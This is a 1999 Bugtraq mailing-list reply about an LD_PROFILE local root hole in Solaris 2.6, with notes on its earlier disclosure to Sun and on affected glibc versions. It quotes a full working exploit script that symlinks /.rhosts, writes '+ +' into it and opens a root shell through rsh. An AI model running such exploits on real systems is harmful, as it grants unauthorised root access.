[11999] in bugtraq
Re: LD_PROFILE local root exploit for solaris 2.6
daemon@ATHENA.MIT.EDU (Pavel Kankovsky)
Sun Sep 26 02:57:01 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <19990925021531.24E.0@bobanek.nowhere.cz>
Date: Sat, 25 Sep 1999 02:25:52 +0200
Reply-To: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
From: Pavel Kankovsky <peak@ARGO.TROJA.MFF.CUNI.CZ>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990922211439.A654@tightrope.demon.co.uk>
On Wed, 22 Sep 1999, Steve Mynott wrote:
> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> # LD_PROFILE local root exploit for solaris
> # steve@tightrope.demon.co.uk 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + > /.rhosts
> rsh -l root localhost csh -i
Old news. I discovered this problem and informed Sun about it in
June 1998. I cannot verify it right now but I think they have already made
a patch for it.
GNU libc 2.something used to be affected as well. The odds are other
platforms having this particular nifty feature (if they exist at all) are
still vulnerable because I forgot to told Bugtraq about it.
Oh, mea culpa! :)
--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]
"Resistance is futile. Open your source code and prepare for assimilation."
